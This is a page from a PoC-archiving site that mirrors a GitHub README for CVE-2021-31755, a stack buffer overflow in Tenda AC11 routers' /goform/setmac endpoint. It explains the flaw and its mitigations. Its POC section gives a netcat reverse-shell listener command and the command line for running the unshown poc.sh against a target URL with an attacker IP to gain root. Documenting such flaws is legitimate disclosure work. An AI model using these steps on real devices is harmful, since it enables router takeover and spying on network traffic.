Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-31755 PoC — Tenda AC11 缓冲区错误漏洞

Source
https://github.com/r3s3tt/CVE-2021-31755
Associated Vulnerability
Title:Tenda AC11 缓冲区错误漏洞 (CVE-2021-31755)
Description:Tenda AC11是中国腾达(Tenda)公司的一款路由器。 Tenda AC11 devices with firmware 02.03.01.104_CN版本及之前版本存在安全漏洞,该漏洞源于/goform/setmac,攻击者可利用该漏洞通过一个精心制作的post请求在系统上执行任意代码。
Description
POC cve-2021-31755
Readme
# CVE-2021-31755

The issue is a **stack buffer overflow vulnerability** discovered in **Tenda AC11 routers**, with firmware versions through **02.03.01.104_CN**. 
This type of vulnerability, if exploited, allows attackers to execute arbitrary code on the affected device. Here's a breakdown of this CVE based on the description:

## Vulnerability Overview
- **CVE Identifier:** CVE-2021-31755 (or a related vulnerability if you're referring to a Tenda-specific issue)
- **Vulnerability Type:** Stack Buffer Overflow
- **Affected Device:** Tenda AC11 Router
- **Firmware Affected:** Through version 02.03.01.104_CN
- **Attack Vector:** A **crafted POST request** to the `/goform/setmac` endpoint

## Description
This vulnerability exists due to improper handling of user input in the **/goform/setmac** endpoint of the Tenda AC11 firmware. 
Specifically, there is a stack buffer overflow, which occurs when an attacker sends an excessively large payload to this endpoint in a POST request. 
Since the application does not properly validate or limit the size of the input, it overwrites critical memory areas in the stack.

When this happens, an attacker can manipulate the memory in such a way that they gain control of the **instruction pointer**, 
which allows them to execute arbitrary code on the device. The impact of such code execution can range from complete takeover of the router, changing its settings, 
spying on traffic, or even launching further attacks on devices connected to the network.

## Exploit Details
- **Attack Method:** The attacker sends a specially crafted POST request to the vulnerable `/goform/setmac` endpoint.
- **Required Access:** The attacker would need network access to the router to exploit this vulnerability.
- **Potential Impact:** Code execution, system control, and further network compromise.

## Mitigation
To mitigate this vulnerability:
1. **Update Firmware:** Tenda has likely released a patch to address this vulnerability in a newer version of the firmware. Users should check for updates and install the latest firmware.
2. **Restrict Access:** If an update is not available or cannot be applied immediately, restrict access to the router’s management interface from untrusted networks.
3. **Use Network-Level Protections:** Employ firewalls and network segmentation to limit exposure of the vulnerable router to the broader internet.


# POC

Run reverse shell listener

```bash
nc -lvp local_port
```

Execute `poc.sh`:

```bash
bash poc.sh remote_url local_ip local_port
```

* _remote_url_ is vulnerable url
* _local_ip_ is an attacker machine IP 
* _local_port_ is an attacker machine port

If the exploit succeeds, root access should be granted.
File Snapshot

 [4.0K]  /data/pocs/5e7bd7e17cf340ca299ac8c9f594a3d1498aa25d
├── [ 39K]  payload.bin
├── [ 593]  poc.sh
└── [2.6K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.